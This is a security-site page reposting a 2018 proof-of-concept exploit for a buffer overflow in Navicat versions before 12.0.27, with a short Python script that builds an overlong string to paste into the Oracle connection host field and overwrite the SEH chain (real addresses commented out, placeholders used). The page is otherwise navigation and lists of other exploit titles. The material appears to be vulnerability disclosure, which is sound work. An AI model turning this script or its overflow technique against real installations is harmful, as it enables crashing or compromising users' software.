首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Navicat < 12.0.27 - Oracle Connection Overflow 来源：https://www.7elements.co.uk 作者：McGuigan 发布时间：2018-05-03   #!/usr/bin/python # Title: Navicat < 12.0.27 Oracle Connection Overflow # Author: Kevin McGuigan # Twitter: @_h3xagram # Author Website: https://www.7elements.co.uk # Vendor Website: https://www.navicat.com # Date: 27/04/2018 # Version: 12.0.26 # Tested on Windows 7 32-bit # Vendor notified on 04/04/2018. Patch issued on 25/04/2018.     # Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow. filename="navicatPOC.txt" junk = "A" * 1502 #nseh = "\x4C\x4C\x77\x04" #seh= "\x75\x2a\x01\x10" nseh = "B" * 4 seh = "C" * 4 fill = "D" * 4000 buffer = junk + nseh + seh + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Drupal < 7.58 - 'Drupalgeddon3 ·Nagios XI 5.2.6 < 5.2.9 / 5.3 ·Oracle Weblogic Server 10.3.6. ·Apple macOS/iOS - ReportCrash ·osCommerce Installer Unauthent ·LibreOffice/Open Office - '.od ·Drupal Drupalgeddon 2 Forms AP ·Easy MPEG to DVD Burner 1.7.11 ·Allok AVI to DVD SVCD VCD Conv ·WebKit - 'WebCore::jsElementSc ·GitList 0.6 - Unauthenticated ·xdebug < 2.5.5 - Unauthenticat   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved